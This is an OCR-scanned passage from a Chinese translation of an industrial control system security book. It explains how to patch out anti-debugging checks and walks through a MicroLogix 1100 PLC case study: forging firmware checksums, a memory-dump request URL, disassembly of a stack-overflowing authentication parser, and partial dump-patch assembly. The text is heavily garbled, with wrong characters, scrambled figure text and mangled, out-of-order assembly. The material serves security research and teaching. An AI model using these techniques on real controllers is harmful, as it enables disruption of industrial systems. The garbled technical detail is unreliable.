条 件 跳 转 指令 的 跳 转 条 件 ， 从 而 得 到 与 之 前 相反 的 判断 结果 ， 即 如 果 调 用 IsDebuggerPresent 函 数 之 后 的 指令 为 jz (如 果 运 算 结果 为 0 则 跳 转 ) ， 那 么 可 以 将 其 更 
改 为 jnz (如 果 运 算 结果 不 为 0 则 跳 转 ) 。 这 样 做 使 得 只 有 在 存在 调试 器 的 情况 下 程序 才 会 继续 执行 。 虽 然 无 需 多 言 ， 但 其 实 我 们 还 是 要 提 一 下 ， 无 论 对 代码 进行 
什么 样 的 改动 ， 首 先 都 应 该 对 原始 文件 进行 备份 。 从 事 安全 方面 的 研究 为 我 们 开展 突破 常规 的 工作 创造 了 绝 佳 的 机 会 ， 但 是 作为 安全 研究 人 员 能 够 使 系统 回 到 原 
点 也 是 应 该 具备 的 基本 能 力 之 一 。 


了 解 到 规避 IsDebuggerPresent 郁 么 容易 ， 最 初 的 开 友 人 员 可 能 会 选择 直接 实现 简单 的 消 数 ， 而 不 是 调用 系统 APl。 这 束 使 得 分 析 过 程 变 得 有 点 复杂 了 ， 因 为 
只 能 搜索 函数 的 字 节 模式 。 但 是 ， 又 由 于 自己 实现 的 函数 会 用 到 指令 mov eax, fs: [00000018]， 其 中 fs 寄存 器 在 程序 中 并 不 常 引 用 ， 因 此 发 现 该 操作 码 也 可 以 清 
楚 地 指示 目标 程序 正在 使 用 反 调试 技术 。 所 以 ， 在 检查 过 程 中 发现 上 述 代码 时 ， 融 需要 对 其 打上 补丁 了 。 


另 一 种 方法 是 利用 陷阱 标志 位 (trap flag) 。CPU 采 用 标志 寄存 器 检测 或 标记 同 最 近 指 令 有 天 的 各 种 条 件 ， 例 如 比较 操作 的 结果 是 否 为 0、 算 术 操 作 是 否 导致 
了 游 出 等 。 其 中 一 个 标志 位 就 是 陷阱 标志 位 ， 调 试 器 可 以 利用 该 标志 位 来 执行 单 步 调试 操作 。 如 前 文 所 述 ， 调 试 器 会 注册 一 个 信号 中 断 处 理 程序 来 获取 触 友 断 点 
时 的 执行 控制 权 。 目 标 程序 也 可 以 利用 信号 中 断 处 理 程序 来 检测 是 否 附加 了 调试 器 。 目 标 程序 还 可 以 为 同一 信号 注册 自己 的 中 断 处 理 程序 ， 在 目标 程序 注册 的 中 
断 处 理 程 序 中 可 以 将 某 一 特别 变量 设置 为 测试 值 ， 并 设置 陷阱 标志 位 ， 然 后 该 中 断 处理 程 序 再 将 测试 值 更 改 为 其 他 值 。 陷 阱 标志 之 后 的 代码 会 对 该 特别 变量 进行 
检查 ， 以 查看 它 是 否 仍 然 为 测试 值 还 是 已 被 目标 程序 注册 的 中 断 处 理 程序 所 更 改 。 如 果 调 试 器 不 存在 ， 那 么 就 会 调用 目标 程序 注册 的 中 断 处 理 程 序 并 将 特别 变量 
更 改 为 测试 值 以 外 的 其 他 值 。 如 果 调 试 器 存在 ， 那 么 就 会 运行 其 注册 的 中 断 处 理 程 序 ， 从 而 使 该 特别 变量 仍 为 原先 设置 的 测试 值 ， 也 就 证 明了 调试 器 的 存在 。 


对 抗 这 种 方法 的 技术 与 之 前 提 到 的 技术 类 似 ， 只 需要 搜索 不 同 的 操作 码 融 可 以 了 。 对 于 修改 标志 寄存 器 的 程序 ， 需 要 用 到 pushfd 和 popfd 指 令 ， 这 两 条 指令 
的 作用 分 别 是 获取 标志 寄存 器 的 值 以 及 设置 标志 寄存 器 。 通 常 在 其 中 一 条 指令 的 附近 就 可 以 找到 另 一 条 指令 ， 而 在 两 条 指令 的 中 间 又 会 找到 一 条 or 指令 设置 陷阱 
标志 。 可 以 采用 多 种 方式 修复 这 一 问题 ， 例 如 反 转 判断 条 件 ， 抑 或 反 转 陷阱 标志 设置 后 特别 变量 的 判断 条 件 ， 还 可 以 使 用 nop 指 令 填充 检查 代码 。 


我 们 介绍 的 最 后 一 种 反 调 试 技术 (注意 ， 本 章 并 未 列 出 所 有 的 反 调 试 技术 ， 只 选择 其 中 具有 代表 性 的 技术 进行 介绍 ) 是 使 用 代码 校 验 和 。 校 验 和 主要 针对 字 
符 串 计算 得 到 。 校 验 和 所 具有 的 一 项 非常 不 错 的 特性 是 对 于 字符 串 (在 我 们 的 例子 中 即 指 目标 二 进 制 文件 ) 的 任何 微小 改动 都 会 导致 校 验 和 友 生 较 大 的 变化 。 如 
果 校 验 和 计算 算法 选择 得 好 ， 那 么 创建 两 个 校 验 和 相同 的 文件 在 计算 上 会 非 党 困难。 程序 员 可 以 针对 包含 程序 指令 的 内 存 区 段 计 算 校 验 和 ， 来 验证 程序 友 布 时 和 
本 次 运行 时 之 间 的 过 程 中 未 发 生变 化 。 校 验 和 方法 能 够 有 效 地 应 对 附加 调试 器 的 情况 ， 因 为 ， 正 如 我 们 在 前 面 提 到 的 ， 断 点 的 设置 实际 上 会 将 内 存 中 程序 的 某 一 
字 节 修改 为 0xXCC， 而 不 是 之 前 的 其 他 指令 。 而 这 个 微小 的 改动 将 导致 校 验 和 函数 的 返回 结果 与 预期 值 不 同 。 为 了 解决 这 个 问题 ， 可 以 给 预期 校 验 和 与 当前 校 验 和 
的 比较 打上 补丁 。 此 外 ， 由 于 大 多 数 校 验 和 消 数 的 计算 过 程 非常 快 ， 因 此 在 不 会 对 程序 运行 性 能 造成 过 大 影响 的 前 提 下 ， 校 验 和 可 以 在 许多 地 方 得 以 应 用 。 这 意 
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[1] XKCD 漫画 将 SQL 注入 以 漫画 的 形式 非常 形象 地 展现 了 出 来 ， 因 此 深 受 社区 用 户 的 喜爱 ， 有 人 受 此 局 发 创建 了 网 站 bobby-tables.com， 该 网 站 致力 于 培训 开发 
者 ， 指 导 他 们 了 解 如 何 阻止 SQL 注入 攻击 。 

[2] «IDA Pro 权威 指南 (第 2 版 ) 》， 人 民 邮 电 出 版 社 2012 年 2 月 出 版 。 一 译 者 注 

[3] «Reversing: 逆向 工程 揭 密 》， 电 子 工业 出 版 社 ，2007 年 9 月 出 版 。 一 译 者 注 

[4] 《C 和 C++ 安全 编码 (第 2 版 ) 》， 机 械 工业 出 版 社 ，2014 年 1 月 出 版 。 一 译 者 注 。 


7.6 步骤 5: 漏洞 利用 


经 过 所 有 分 析 之 后 ， 我 们 应 该 已 经 挖掘 到 了 几 个 漏洞 。 任 何 软 件 ， 哪 怕 只 是 中 等 规模 (5000+ 行 源 代 码 ) 的 软件 也 很 可 能 至 少 存在 一 个 漏洞 。 同 目标 连接 的 
系统 越 多 ， 残 越 有 可 能 存在 可 利用 的 漏洞 。 这 正 是 研究 人 员 不 同 于 真实 攻击 者 的 地 方 。 真 实 的 攻击 者 会 编写 漏洞 利用 工具 来 达成 攻击 目标 ， 例 如 物理 损坏 、 信 息 
丢失 、 系 统 停机 以 及 其 他 恶意 目的 。 而 作为 研究 人 员 ， 我 们 的 目标 只 是 证 明 这 样 的 事情 是 可 能 出 现 的 。 我 们 可 以 通过 演示 被 测 系 统 的 连接 中 断 ， 证 明 存 人 在 拒绝 服 
务 漏洞 。 漏 洞 利用 的 PoC 可 能 会 在 人 机 界面 上 启动 接 龙 游戏 ， 以 证 明 攻 击 者 可 以 远程 执行 任意 程序 。 


Po< 的 利用 细节 在 很 大 程度 上 取决 于 漏洞 。 事 实 上 ， 在 从 事 网 络 犯罪 的 地 下 组 织 中 ， 漏 洞 利 用 工具 的 编写 本 身 就 是 一 门 专业 并 且 可 以 进一步 细 分 。 例 如 ， 网 
络 漏洞 利用 、 特 权 提 升 、 会 话 劫持 、 日 志清 理 ， 等 等 。 在 这 里 列 出 所 有 清单 是 不 可 能 的 。 我 们 仪 融 其 中 的 部 分 实例 进行 介绍 ， 为 漏洞 利用 提供 一 个 思路 ， 并 希望 
能 够 进一步 激发 读者 的 创造 力 。 


如 果 挖 气 出 的 漏洞 是 硬 编码 口令 或 者 后 门 ， 那 么 漏洞 利用 的 PoC 会 非常 简单 ， 只 需要 展示 能 够 访问 目标 系统 的 口令 即 可 。 假 设 在 静态 二 进 制 分 析 步 骤 中 友 
现 ， 处 理 传 入 网 络 连接 的 代码 无 法 正确 释放 为 每 个 连接 分 配 的 内 存 。 在 编程 中 ， 这 种 情况 称 之 为 内 存 泄漏 。 当 有 人 故意 创建 同 设备 的 大 量 和 连接 时 ， 比 如 说 每 秒 起 
过 100 个 连接 ， 那 么 将 会 迅速 耗 尽 可 用 内 存 ， 并 导致 合法 的 网 络 客户 端 要 么 连接 速度 缓慢 要 么 根本 连接 不 上 ， 这 就 成 为 了 一 个 安全 问题 。 同 时 ， 内 存 泄 漏 还 可 能 导 
致 设备 在 其 他 方面 也 表现 不 佳 ， 因 为 设备 中 的 各 个 应 用 之 间 共 享 内 存 ， 而 内 存 都 已 被 来 自 漏洞 程序 的 大 量 连 接 所 占用 ， 从 而 引起 内 存 不 足 甚至 造成 整个 进程 衣 
溃 ， 需 要 重启 设备 。 当 然 还 可 能 友 生 更 糟糕 的 事情 ， 假 设 存 在 一 个 网 站 ， 该 网 站 连接 着 成 百 甚 至 上 干 台 存在 漏洞 的 PLC， 而 攻击 者 能 够 以 前 面 提 到 的 方式 进行 漏 
洞 利 用 。 这 束 可 能 导致 系统 长 时 间 停 机 并 造成 经 济 损失 。 而 这 还 仪 仅 是 一 个 很 简单 的 内 存 泄漏 漏洞 所 可 能 导致 的 危害 。 


让 我 们 来 考虑 一 些 更 复杂 的 情况 。 假 设 友 现 了 一 个 缓冲 区 溢出 漏洞 ， 该 漏洞 会 导致 覆盖 消 数 的 返回 地 址 。 这 听 起 来 像 是 在 20 世 纪 90 年 代 常见 的 漏洞 ， 但 是 今 
天 在 工控 系统 设备 中 仍然 经 党 出 现 。 只 需要 看 看 IC9-CERT 最 近 一 周 友 布 的 漏洞 公告 ， 融 会 友 现 几乎 肯定 可 以 找到 至 少 一 个 栈 溢出 漏洞 。 现 在 假设 在 用 户 认 证 之 前 
进行 连接 尝试 的 消 数 或 者 进行 身份 验证 的 消 数 中 找到 了 一 个 漏洞 。 基 于 对 运行 进程 的 二 进 制 代码 分 析 得 到 的 错综复杂 的 信息 (通过 静态 或 动态 分 析 获 得 ) ， 漏 洞 
利用 工具 可 以 对 调用 堆栈 进行 操作 ， 使 其 返回 到 通常 只 有 认证 用 户 才 可 以 访问 的 溯 数 ， 从 而 使 得 攻击 者 能 够 绕 过 认证 。 通 常 这 种 攻击 的 目的 是 获取 目标 的 远程 
shell， 但 也 不 需要 非得 这 么 复杂 。 攻 击 者 可 能 只 需要 运行 一 个 函数 融 能 够 严重 威胁 到 设备 的 安全 。 这 样 做 比 得 到 shell 要 容易 得 多 。 为 了 证 明 类 似 的 漏洞 利用 是 可 
能 存在 的 ， 漏 洞 利用 的 PoC 可 能 会 执行 一 些 正 常 的 操作 ， 例 如 调用 日 志 遂 数 打 印 出 一 段 易于 识别 的 信息 ， 从 而 证 明 任 何 浮 数 其 实 都 可 以 被 调用 。 实 际 上 ， 这 同 最 
危险 的 漏洞 利用 方式 只 有 一 步 乙 遥 。 


最 危险 的 漏洞 利用 方式 是 远程 代码 执行 。 攻 击 者 不 仅 可 以 从 用 户 的 设备 上 运行 任意 代码 ， 而 且 还 可 以 上 传 可 执行 代码 并 运行 它 。 上 传 的 代码 可 以 是 任何 代 
码 ! 这 是 最 危险 的 漏洞 利用 方式 ， 同 时 也 是 最 难 实现 的 ， 这 也 意味 着 对 于 远程 代码 执行 漏洞 难以 提供 PoC。 调 用 系统 现 有 遂 数 足以 说 服 程序 员 修 复 问 题 ， 但 是 展 
示 代 码 的 上 传 和 执行 则 被 看 作 是 入 侵 的 终 级 目标 。 根 据 目 标的 不 同 ， 对 此 有 多 种 扩 巧 可 以 利用 ， 同 时 也 存在 大 量 需 要 克服 的 困难 。 相 天 详细 信息 ， 建 议 阅 读 《The 
Shellcoder’ s Handbook》 一 书 。 


7.7 BASSI: MicroLogix 案 例 研 究 


之 前 的 章节 强调 过 所 有 软件 缘 有 漏洞 。 这 一 论断 再 怎 么 强调 都 不 为 过 ， 本 节 中 也 是 显而易见 的 。 本 节 中 将 就 某 个 研究 项 目 进行 详细 地 介绍 ， 该 研究 项 目 成 功 
在 Rockwell Automation 公 司 的 Allen-Bradley MicroLogix 系 列 控制 器 中 挖掘 到 了 若干 漏洞 ， 其 中 就 包括 了 远程 代码 执行 漏洞 ， 并 提供 了 与 之 对 应 的 PoC 代 码 。 
这 进一步 说 明了 所 有 软件 此 有 漏洞 ， 无 论 厂 商 是 KingView、Allen-Bradley、Siemens、Schneider Electric, Rockwell Automation 还 是 其 他 什么 公司 。 


《 men 
WS 注意 


从 技术 上 讲 ， 我 们 将 要 展示 的 PoC 代 码 采 用 汇编 转 储 形 式 。 这 确保 了 只 有 那些 真正 了 解 漏洞 利用 及 其 影响 的 人 才能 够 在 受 控 环 境 中 对 漏洞 利用 工具 进行 解码 和 
实验 。 事 实 上 ， 一 个 毫 无 经 验 的 人 如 果 不 负 责任 地 随意 使 用 已 经 调试 完成 的 漏洞 利用 代码 相当 危险 。 如 果 自 己 难以 理解 所 提出 的 代码 ， 那么 希望 这 将 激励 读者 开 


始 高 级 漏洞 利用 方式 和 汇编 语言 的 学 习 ! 


本 节 的 案例 研究 将 尽 可 能 全 面 地 介绍 针对 Rockwell Automation 公 司 的 Allen-Bradley MicroLogix 系 列 控制 器 所 开展 的 研究 过 程 。 该 项 研究 由 工业 网 络 安全 
公司 Cyber X 开 展 并 提供 研究 结果 。 我 们 在 本 节 主 要 介绍 一 次 完整 的 研究 流程 ， 希 望 读者 能 够 从 一 个 全 局 的 视角 来 审视 整个 研究 过 程 ， 其 中 包括 了 本 章 和 上 一 章 中 


提 到 的 几 种 攻击 形式 。 


当 考 虑 该 研究 的 成 果 时 ， 涉 及 了 另 一 个 重要 的 方面 。 该 研究 从 头 至 尾 详细 地 介绍 了 在 单个 PLC 上 开发 多 个 漏洞 利用 工具 的 过 程 。 这 是 通过 Cyber X 公 司 提出 的 
专 有 “固件 调试 ”技术 来 实现 的 ， 该 专 有 技术 实质 上 是 一 个 用 于 对 该 设备 进行 漏洞 挖掘 和 验证 的 框架 。 研 究 过 程 中 挖 据 出 了 一 个 远程 代码 执行 漏洞 ， 即 CVE- 
2015-6490， 并 开发 出 了 相应 的 PoC。 


当 把 这 些 内 容 融 合 汇总 在 一 起 时 ， 需 要 记 住 安全 漏洞 随处 可 见 ， 而 由 此 产生 的 后 果 可 能 比 预 想 的 更 为 严重 。 
7.7.1 漏洞 研究 的 准备 


本 研究 主要 关注 Allen-Bradley MicroLogix1100， 如 图 7-7 所 示 。 当 选择 PLC 作 为 研究 目标 时 ， 对 其 固件 可 用 性 进行 成 本 效益 分 析 非 常 重要 。 有 些 厂商 不 提供 
固件 更 新 ， 这 就 意味 着 需要 从 闪存 中 提取 固件 。 这 一 过 程 非常 耗 时 并 且 作 用 也 不 明显 。 但 是 ，MicroLogix1100 的 固件 能 够 从 厂商 的 官方 网 站 上 获取 。 该 PLC 已 经 
使 用 了 近 10 年 ， 最 新 的 固件 更 新 是 2014 年 的 。 因 此 ， 需 要 对 设备 上 是 否 已 经 安装 了 最 新 的 固件 版 本 进行 验证 。 


图 7-7 Allen-Bradley MicroLogix 1100 


7.7.2 深入 之 前 的 工作 


下 一 步 是 对 设备 的 每 个 细节 进行 研究 ， 以 方便 开展 下 一 步 工 作 。 通 过 RJ45 接 口 连 接 设备 并 对 其 进行 端口 扫描 ， 可 以 友 现 对 80 端 口 (HTTP) 和 44818 端 口 
(EtherNet/IP) 扫描 得 到 的 信息 比较 有 意思 。 


1.HTTP 服 务 端 
如 图 7-8 所 示 ，HTTP 服 务 端 的 界面 很 简单 ， 只 包含 了 有 天 设备 的 统计 信息 、 用 户 管理 页 面 和 一 些 用 户 定 义 页 面 。 通 过 HTTP 协 议 消息 首部 (Header) 中 的 
Server 字 段 可 以 确定 端口 特征 ; 其 唯一 值 为 A-B WWW/0.1。 自 定义 的 服务 端 首 部 信息 表示 其 对 HTTP 协 议 进 行 了 自 定义 实现 。 稍 后 对 HTTP 服 务 端的 逆向 分 析 也 


揭示 了 该 实现 方式 实际 上 是 Allen-Bradley 公 司 的 专 有 实现 方式 。 其 中 一 个 值得 注意 的 问题 是 ， 在 编码 过 程 中 对 几乎 所 有 的 输入 缓冲 区 都 进行 了 尺寸 限制 ， 这 说 明 
在 开发 时 开 有 友人 员 采 用 了 安全 的 编码 方式 。 


| @ Aten-Bradey Allen-Bradley Wh /ss EC PEN Ae 


Device Name 1766-L32AWA B/14.00 


Device Description MicroLogix 1400 Processor 


Device Location 

Ethernet Address (MAC) 

IP Address 

OS Revision Seres B FRN 14.0 
HTML File Revision r A 

Current Time Jul 21 2015, 16:55:30 
CPU Mode Remote Run 


图 7-8 MicroLogixl 100Web IR 4-3% 49 AZ 
2. 基 于 EtherNet/IP 协 议 的 44818 端 口 


该 端口 暴露 出 了 以 下 信息 : 


Product name: 1763-L16AWA B/14.00 

Vendor ID: Rockwell Automation/Allen-Bradley 
Serial number: [DWORD] 

Device type: Communications Adapter 

Device IP: 192.168.90.90 


产品 名 称 由 产品 编号 和 固件 版 本 号 组 成 。 例 如 ， 产 品 编号 是 1763-L16AWA， 即 表示 产品 为 MicroLogix1100， 国 件 版 本 号 是 B/14.00， 即 表示 本 研究 所 针对 的 
是 固件 版 本 号 为 14， 也 就 是 最 新 的 版 本 。 


3. 了 解 固 件 


使 用 PLC 的 更 新 程序 提取 文件 ML1100_R03R14 Os.bin， 然 后 使 用 binwalk 工 具 (http://binwalk.org/) 对 其 进行 扫描 ， 但 是 没有 发 现 什 么 重要 结果 。 分 析 其 
原因 在 于 镜像 文件 只 是 一 个 规模 较 大 的 二 进 制 代 码 块 。 


下 一 步 融 是 确定 固件 运行 的 CPU 类 型 。 虽 然 Allen-Bradley 在 他 们 的 官方 文档 中 表示 其 CPU 架构 是 独一无二 的 并 且 采 用 专 有 技术 予以 实现 ， 但 是 在 网 上 一 搜 融 
会 友 现 其 使 用 的 CPU 其 实 束 是 一 颗 基于 ColdFire v2 架构 的 CPU。 


根据 ColdFire CPU 的 配置 信息 将 固件 加 载 到 IDA Pro 中 ， 并 指导 IDA 从 第 一 条 指令 开始 进行 反 汇 编 ， 发 现 固件 以 JjMP 操 作 码 开始 。 由 于 未 提供 实际 的 装载 偏 移 
地 址 ， 因 此 1DA 无 法 对 镜像 进行 分 析 。 更 新 程序 中 还 包括 一 个 名 为 ML1100 R03R14_Os.nvs 的 文件 ， 以 及 一 个 包含 StartingLocation=0x00008000 信 息 的 配置 文 
件 ， 这 正 是 真正 的 ROM 偏 移 地 址 。 为 了 确定 RAM 偏 移 地 址 和 大 小 ， 需 要 对 反 汇 编 操 作 码 的 偏 移 地 址 进行 分 析 ， 并 且 选 择 相应 的 值 以 便 覆 羡 其 取 值 范围 。 


7.7.3 打造 定制 固件 


为 了 更 好 地 了 解 该 固件 的 工作 机 理 并 开 友 一 套 蛙 有 成 效 的 远程 代码 执行 漏洞 利用 工具 ， 需 要 深入 了 解 内 存 使 用 情况 。 由 于 没有 发 现 明显 的 内 存 泄漏 漏洞 ， 所 
以 Cyber X 公 司 决定 打造 一 个 定制 固件 ， 以 进行 内 存 转 储 。 


第 一 次 给 固件 打 补 丁 并 上 传 固件 的 尝试 失败 了 。 固 件 的 引导 阶段 返回 了 一 条 错误 信息 ， 指 出 有 人 试图 上 传 损 坏 的 固件 ， 这 说 明 存 在 校 验 和 算法 。 由 于 校 验 和 
算法 存在 多 种 应 用 方式 ， 因 此 ， 研 究 人 员 必 须 确 定 校 验 和 算法 是 否 是 位 置 相关 的 校 验 和 算法 (类 似 于 CRC 或 者 MD5 算 法 ) ， 还 是 仅仅 为 常规 的 校 验 和 算法 ( 例 
如 ， 所 有 字 节 的 总 和 ) 。 为 了 对 此 进行 测试 ， 在 最 新 的 固件 代码 中 ， 任 意 交换 其 中 某 两 个 字 节 的 位 置 ， 然 后 将 其 上 载 到 设备 ， 友 现 此 时 操作 成 功 ， 从 而 我 们 得 出 
结论 用 于 错误 检查 的 校 验 和 算法 是 与 位 置 无 天 的 。 


在 确定 校 验 和 是 普通 的 老式 校 验 和 算法 后 ， 下 一 步 融 是 研究 固件 首部 。 通 过 对 几 个 固件 镜像 进行 比较 ， 研 究 人 员 友 现 了 它们 之 间 的 变化 ， 以 及 它们 如 何 影响 
首部 中 的 字 节 。 然 后 得 出 结论 : 固件 中 存在 两 个 校 验 和 ， 一 个 用 于 首部 校 验 ， 一 个 用 于 其 余数 据 的 校 验 。 


第 一 个 明显 的 变化 是 版 本 信息 。 字 节 0xE 表 示 固 件 版 本 号 为 14。 任 何 仪 对 该 字 节 进行 改动 的 尝试 都 会 导致 固件 上 传 失 败 ， 这 意味 着 在 对 校 验 和 的 计算 过 程 中 包 
含 版 本 信息 。 


再 次 ， 通 过 分 析 几 个 固件 镜像 之 间 的 差异 ， 研 究 人 员 友 现 ， 一 旦 版 本 号 增加 ， 字 节 0x3E 和 0x3F 的 值 束 会 减 小 。 对 此 ， 研 究 人 员 推 导出 了 校 验 和 算法 ， 推 导出 
的 校 验 和 算法 如 下 所 示 : 


[LO0X3BE-OX3E (Big Endian) = OxFFFF - sum all bytes([0x11-0x3B]) 


此 校 验 和 主要 用 于 IP 通 信 ， 也 被 称 为 网 际 校 验 和 (Internet Checksum) 。 利 用 该 校 验 和 能 够 调整 首部 ， 甚 至 可 以 上 传 版 本 号 并 不 存在 的 固件 ， 例 如 99。 


MicroLogix 


hfe 


由 于 无 法 精确 定位 参与 求 和 计算 的 字段 ， 找 出 整个 文件 的 校 验 和 算法 要 困难 得 多 。 因 此 ， 需 要 采取 不 同 的 方法 。 首 先 ， 定 义 代码 的 开始 位 置 ， 如 下 图 所 示 : 


Offset (h) 


00000000 Na... PYYFWRL. .n/ 
00000010 a...%.ML-1100 Op 
00000020 er System 
00000030 

00000040 

00000050 

00000060 

00000070 

00000080 

00000090 Taiaiata'ata'atata’ata’atae at 
000000A0 wenn 
O000000B0 iu 


000000C0 


000000D0O 
000000E0 
000000F0 
00000100 
00000110 
00000120 
00000130 
00000140 
00000150 
00000160 
00000170 
00000180 
00000190 
00000140 .. [@..€0%«ya |G. 


接着 假设 : 
[Global checksum] = [Header fields checksum] + [Code area checksum] 


这 意味 着 给 代码 区 域 打 补丁 将 会 影响 全 局 校 验 和 。 因 此 ， 研 究 人 员 不 再 试图 找 出 计算 全 局 校 验 和 的 过 程 中 用 到 了 哪个 算法 ， 而 是 对 整个 代码 区 域 计算 了 一 次 
校 验 和 。 然 后 ， 对 于 应 用 的 每 个 补丁 都 简单 地 修改 几 个 字 节 ， 以 确保 新 的 校 验 和 同 最 初 的 值 保持 一 致 。 


对 不 带 首部 的 整个 代码 区 域 的 校 验 和 为 0x*228972c。 那 么 ， 假 没 打 完 补丁 之 后 的 校 验 和 为 0x228971c。 由 于 0x228972c-0x228971c=0x10， 因 此 必须 在 代码 
中 选择 一 个 字 节 并 对 其 进行 修改 以 “弥补 差距 ”。 如 果 字 节 值 为 0x00， 那 么 需要 将 其 修改 为 0x10。 当 然 ， 这 样 做 时 非常 重要 的 一 点 在 于 ， 要 确保 这 样 的 改动 对 于 
固件 的 正常 运行 不 会 有 大 的 影响 ， 也 就 意味 着 我 们 必须 选择 不 会 用 到 的 代码 或 者 不 会 访问 到 的 页 面 ， 又 或 者 只 是 对 几 个 字符 串 进行 改动 。 


这 种 技术 使 得 研究 人 员 在 成 功 上 传 打 上 补丁 的 固件 镜像 之 后 ， 仍 能 够 保持 最 初 的 校 验 和 不 变 。 
1. 内 存 转 储 


为 了 进行 内 存 转 储 ， 人 研究 人 员 通 常会 修改 某 个 HTTP 页 面 处 理 程序 。 选 择 页 面 处 理 程序 时 要 确保 设备 能 够 正常 引导 且 正 常 工 作 ， 并 仅 在 发送 HTTP 请 求 时 触发 
代码 的 执行 。 这 种 方法 在 调试 时 颇 有 帮助 ， 因 为 它 能 够 确保 不 稳定 的 定制 补丁 只 会 在 该 点 月 演 。 


关于 补丁 的 另 一 个 重要 问题 是 只 能 使 用 权限 有 限 的 指令 集 。 虽 然 根据 响应 信息 看 起 来 似乎 设备 使 用 的 是 标准 ColdFire CPU， 但 很 可 能 出 于 优化 目的 ， 指 令 集 
中 缺少 了 部 分 指令 以 致 定制 补丁 执行 失败 。 因 此 ， 只 使 用 在 原始 镜像 中 发 现 的 指令 开发 定制 补丁 就 能 够 克服 这 个 问题 。 


给 页 面 处 理 程序 打 补 丁 意味 着 剥离 其 所 有 功能 ， 并 采用 执行 转 储 功 能 的 代码 蔡 换 原来 的 代码 。 该 代码 将 第 一 个 key-value 形 式 的 HTTP 参 数 转换 为 2x32 位 的 整 
数 ， 并 转 储 这 两 值 之 间 所 有 的 内 存 数据 。 例 如 ， 如 下 形式 的 请 求 信息 会 在 响应 中 返回 地 址 B0000000 与 地 址 B0100000 之 间 的 所 有 内 存 数 据 : 


http://192.168.90.90/diagover.dat?B0000000=B0100000 


内 存 转 储 代码 放 在 本 节 的 最 后 。 


转 储 生成 了 1MB 的 内 存 转 储 数据 。 这 为 开发 远程 代码 执行 PoC 提 供 了 所 有 要 用 到 的 数据 。 引 导 固 件 镜 像 同 时 也 被 转 储 了 。 


2. 潜 在 漏洞 函数 的 映射 


为 了 便于 映射 潜在 的 漏洞 函数 ， 研 究 人 员 编 写 了 IDAPython 脚 本 对 HTTP 解 析 树 代码 中 可 


致 缓冲 区 溢出 漏洞 的 函数 进行 映射 。 


该 脚本 通过 遍历 HTTP 解 析 代 码 树 ， 并 在 解析 树 中 映射 出 所 有 远程 代码 执行 漏洞 的 特征 从 而 定位 漏洞 。 例 如 ， 循 环 中 的 单字 节 复 制 操作 包含 以 下 模式 : 


move.b (a3)4, 


3. 孙 数 漏 洞 的 验证 


对 于 可 能 存在 缓冲 区 溢出 漏洞 的 浮 数 ， 会 将 一 定数 量 的 数据 复制 到 较 小 的 缓冲 区 中 。 按 照 这 一 要 求 研究 人 员 发 现 了 一 个 遂 数 ， 其 功能 主要 是 负责 解析 认证 消 


数 内 部 的 认证 摘要 首部 。 


从 图 7-9 中 可 以 看 到 在 栈 中 分 配 了 0x21 (33) 个 字 节 ， 但 是 负责 解析 该 首部 字段 的 函数 将 其 长 度 限 制 为 0x2c (44) 个 字 节 。 


这 对 于 缓冲 区 溢出 攻击 而 言 已 经 绰绰有余 。 


I uu, Ù 


beq.s loc_419EA 


cmpa.l 6x2C(a2), a3 
bge.s loc_419EA 


4 


ew 四 


cmpi.l #@xFF, d2 
bcs -5 loc _419AC 


loc 419AC: 
move.b d4, dð 


|moueq #6x2C, dif 
bne.s loc 419BA 


addq.1 #1, a3 

bra.s loc_419EA; |loc_419BA: 
movea.1 DA arg nc(a6), ab 
move.b (a3)+, (€a8,d2.1) 
addg.1 #1, d2 


` 


loc _419EA: 
movea.1l DA arg ne(a6), ab 
cle -b (a6,d2.1) 


图 7-9 


式 也 能 够 导致 代码 执行 。 


虽然 可 能 存在 其 他 方法 ， 但 是 通过 漏洞 利用 代码 友 送 shellcode 的 最 简单 的 方法 是 将 shellcode 作 为 URI 的 一 个 参数 ， 这 是 因为 URI 中 所 有 的 参数 都 会 被 解析 ， 
并 存放 在 内 存 中 的 某 个 固定 地 址 中 。Shellcode 的 作用 是 在 PLC 显 示 菜 单 中 打印 “CyberX”。 图 7-10 显 示 了 漏洞 利用 代码 执行 之 前 与 执行 之 后 的 PLC 


4. 定 制 固件 的 内 存 转 储 代码 


(a0,d2.1) 


DA_ParseAuthVulnerable: 


var 246= -0x240 

Var 228= -0x228 

Var 1D3= -6x1D3 
DA_var_uri= -6x1CD 

var CD= —-6xCD 

DA var response= —-§xAC 
DA uar cnonce= -6x8B 


|DA_var_nc= -80x21 


arg 4= BxC 
DA_arg_username= 6x16 
arg C= 8x14 

arg 18= 6x18 


aó, #-6x246 
d2-d4/a2-a4, (sp) 
arg 6(a6), a2 

var 228(a6), að 
HOxES, d4 

að, -(sp) 

DA var urif€a6) 

DA _var_response(a6é) 
DA_var_cnonce(a6) 
DA_var_nonce(a6) 

DA _var_nc{a6) 

arg 4(a6), -(sp) 

DA ParseAuthorizationDigest 
dg 

8x1C(sp), sp 

loc 4257E 


(unk BOG18C28).1, a3 


#1, d8 

dð, -(sp) 
DA_SomeLogicTODO 
#0, (a3) 


一 上 一 


在 标记 出 可 能 存在 缓冲 区 溢出 漏洞 的 国 数 之 后 ， 可 以 向 设备 发 送 一 些 不 仓 在 的 地 址 ， 然 后 观察 设备 的 崩溃 过 程 。 但 是 ， 造 成 设备 衣 溃 并 不 足以 说 明 同 样 的 方 


这 意味 着 存在 11 个 字 节 的 溢出 ， 


-一 二 
显示 采 早 。 


ORG S35990 
START: 
link a6, #-36 
movem.1 d0-d4/a0-a3, (sp) 


-y = 
CN å (Ce 
= = | 


© aw a ame 


Ow 
wa 


a = 


MicroLogix 
fae 


peel 四 


图 7-10 左边 为 漏洞 利用 代码 执行 之 前 的 PLC 显 示 菜 单 ， 右 边 为 漏洞 利用 代码 执行 之 后 的 PLC 显 示 菜 单 


move.l #SB0019524, a0 ; First HTTP URI argument key 
move.l (a0), a0 

jsr atoi 

move.l do, d4 


move.l #5B0019528, a0 ; First HTTP URI argument value 
move.l (a0), a0 

jer. atoi 

sub. l d4, dô 


move.l d0, - (sp) > Data size 
move.l d4, -(sp) ; Data to send 
move.l 12(a6), - (sp) 

move.l 8(a6), -(sp) 

] Sr 人 ; TCP Send 


movem.1l -36(a6), d0-d4/a0-a3 
unik a6 
rts 


atoi: 
moveq.l1 #0,d0 
moveg.l #0,dl1 
digit: 
move.b (a0)4+,dl1 


beq.s .done 
moveq #'O', d2 
emp. 1 d2, dl 
blt.s .done 
moveq #'f', d2 
cmp. l d2, dl 
bgt.s .done 


moveg #'a', d2 
cmp. Ll Qà; dl 
